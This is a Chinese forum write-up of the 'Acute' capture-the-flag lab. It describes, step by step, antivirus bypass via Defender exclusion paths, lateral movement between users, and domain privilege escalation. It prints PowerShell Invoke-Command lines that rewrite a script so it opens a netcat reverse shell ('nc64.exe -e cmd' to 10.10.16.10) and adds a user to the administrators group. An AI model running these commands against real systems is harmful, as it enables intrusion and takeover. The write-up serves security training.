域渗透实战之Acute
vghost 发表于 辽宁 渗透测试 850浏览 · 2024-01-24 03:41

信息收集

端口扫描

使用nmap进行端口探测,发现只存在443端口。

发现有一个atsserver.acute.local的证书

访问主页,发现访问不到。

目录爆破

接着使用工具尝试目录爆破

发现存在一个静态页面

在最上角发现了一个docx文件。


下载之后,打开发现存在有两个员工入职页面的链接

发现了一个默认密码。
还发现了一个远程链接。

文件检查

接着对文件进行检查

发现了一个远程链接地址

访问之后,发现一个登录界面。

对于我们收集到的用户,进行默认密码尝试。

edavies登录

找到一个可用用户,并成功进行登录。

漏洞利用

生成木马

接着使用msf来生成木马。

建立监听

接着执行木马文件。

Bypas av

在C:\Utils看起来是空目录,运行 with-force显示一个隐藏文件

reg query "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths

接着进行重新上传。

重新生成木马,进行上传。

msf成功上线。

容器/虚拟机

然后进行信息收集。

imonk登录

发现这个系统里面有其它用户。

WinPEAS

上传工具,进行自动化检索。

屏幕共享

利用msf的屏幕共享进行查看主机信息。

发现显示有一个密码。
● 用户是acute\imonks,密码为“w3_4R3_th3_f0rce.”。
● edavies 正在尝试向 ATSSERVER 进行身份验证。
● edavies 正在尝试使用dc_manage上面提到的配置。

Powershell执行

创建一个用于 ATSSERVER 的用户

然后进行尝试,发现没有成功。

接着进行测试。

命令执行

接着尝试使用powershell来执行命令,成功获取user.txt

jmorgan登录

查看Get-Alias设置的内容

桌面文件

在桌面上发现wm.ps1脚本。

发现脚本是一些用户信息。

$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {Get-Volume} -ComputerName Acute-PC01 -Credential $creds

DC信息

接着进行DC信息收集

尝试添加用户到管理组,没有成功。

修改脚本

修改脚本来进行反弹shell。

Invoke-Command -ScriptBlock { cat ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
$securepasswd = '01000000d08c9ddf0115d1118c7a00c04fc297eb0100000096ed5ae76bd0da4c825bdd9f24083e5c0000000002000000000003660000c00000001000000080f704e251793f5d4f903c7158c8213d0000000004800000a000000010000000ac2606ccfda6b4e0a9d56a20417d2f67280000009497141b794c6cb963d2460bd96ddcea35b25ff248a53af0924572cd3ee91a28dba01e062ef1c026140000000f66f5cec1b264411d8a263a2ca854bc6e453c51'
$passwd = $securepasswd | ConvertTo-SecureString
$creds = New-Object System.Management.Automation.PSCredential ("acute\jmorgan", $passwd)
Invoke-Command -ScriptBlock {C:\utils\nc64.exe -e cmd 10.10.16.10 443} -ComputerName Acute-PC01 -Credential $creds
Invoke-Command-ScriptBlock{((cat..\desktop\wm.ps1-Raw)-replace'Get-Volume','C:\utils\nc64.exe -e cmd 10.10.16.10 443')|sc-Path..\desktop\wm.ps1}-ComputerNameATSSERVER-ConfigurationNamedc_manage-Credential$cred
Invoke-Command -ScriptBlock { ((cat ..\desktop\wm.ps1 -Raw) -replace 'Get-Volume', 'C:\utils\nc64.exe -e cmd 10.10.16.10 443') | sc -Path ..\desktop\wm.ps1 } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -Computername ATSSERVER -ConfigurationName dc_manage -ScriptBlock {((Get-Content "c:\Users\imonks\Desktop\wm.ps1" -Raw) -replace 'Get-Volume','net localgroup administrators edavies /add') | set-content -path c:\users\imonks\Desktop\wm.ps1} -credential $Creds
Invoke-Command -Computername ATSSERVER -ConfigurationName dc_manage -ScriptBlock {((cat ..\desktop\wm.ps1 -Raw) -replace 'Get-Volume','net localgroup administrators edavies /add') | set-content -path  ..\desktop\wm.ps1} -credential $Creds

然后重启主机,进行测试,发现可用执行。

反弹shell

成功获取shell

获取密码

转存域用户信息。

接着进行下载到本地。

获取哈希值

使用secretsdump.py来获取hash。

hash破解

接着使用hashcat来破解hash。

awallace登录

密码复用

接着继续登录用户,进行收集信息。

查看域用户组。

添加用户

在管理组里面添加用户,

使用powershell来添加域用户。

接着上传nc,来反弹shell。

最后成功获取shell。

总结:
该环境是在不同用户之间进行切换,一环套一环,然后最后获得管理员权限,并最后使用msf和powershell来进行渗透测试和权限提升。

0 条评论
某人
表情
可输入 255

没有评论